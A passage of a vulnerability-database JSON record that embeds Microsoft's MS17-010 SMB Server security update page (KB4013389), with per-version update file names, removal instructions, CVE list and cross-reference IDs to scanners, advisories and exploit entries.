Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-01-01T22:39:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["KB4012598"], "type": "mskb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-01-01T22:39:28", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "ef6b7115694a138be53b122aac16e8a691361b61c8a39d4ea39de2349a569610", "hashmap": [{"hash": "ba4b35c5b6cbeae7458c44303b393638", "key": "href"}, {"hash": "140864078aeca1c7c35b4beb33c53c34", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "5f532a3fc4f1ea403f37070f59a7a53a", "key": "bulletinFamily"}, {"hash": "f96bf1d801552d52091ad0866ebdf356", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5a498871a848d25d798ef27dcbd52a89", "key": "title"}, {"hash": "5ee5f53b9d07be79a50e7281a2bfec4e", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "3a3a69118b5452ccfeb3abf80705c731", "key": "modified"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}], "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "lastseen": "2021-01-01T22:39:28", "modified": "2017-03-14T17:40:20", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Microsoft", "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 404}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-01-01T22:39:28"}, {"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>indows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported 